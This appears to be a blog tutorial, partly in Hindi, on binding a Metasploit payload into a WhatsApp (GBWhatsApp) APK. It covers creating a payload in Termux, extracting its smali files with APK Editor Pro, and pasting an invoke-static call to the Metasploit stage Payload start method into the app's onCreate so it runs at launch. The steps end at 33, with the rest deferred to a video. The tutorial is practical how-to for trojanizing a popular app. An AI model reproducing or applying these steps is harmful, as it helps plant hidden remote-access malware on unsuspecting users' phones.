How to bind payload in WhatsApp || how to bind payload in any APK || how to bind payload manually

How to bind payload in WhatsApp




1. open termux & create a payload

(Note:- if you are not know how to make payload then you can see this video
)

2. open APK editor Pro APK

APK editor Pro APK link
👇👇👇👇👇👇👇👇👇👇
APK editor Pro 3. click select APK from file

4. select your payload

5. click Full edit

6. select all files

7. select files

8. click on smali

9. open smali folder

10. open com folder

11. open your file manager & create a folder

12. go to APK editor Pro

13. tick metasploit folder & extract in to your folder

14. go back & tick android manifest.xml & extract in to your folder

15. go back & exit

16. re open your APK editor Pro application

17. click select APK from file

18. select WhatsApp apk


Gbwhatsapp APK link
👇👇👇👇👇👇👇👇👇
Gbwhatsapp APK

19. click Full edit

20. select all files

21. select files

22. click on smali

23. open smali folder

24. open com folder

25. open GBWhatsApp folder

26. click main.smali

27. click here

28. select on create

29. paste this commond
👇👇👇👇👇👇👇👇👇👇👇
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

30. save

31. back & create a metasploit folder

32. open metasploit folder & create a stage folder

33. next step ke liye video dekhiye

Post a Comment

0 Comments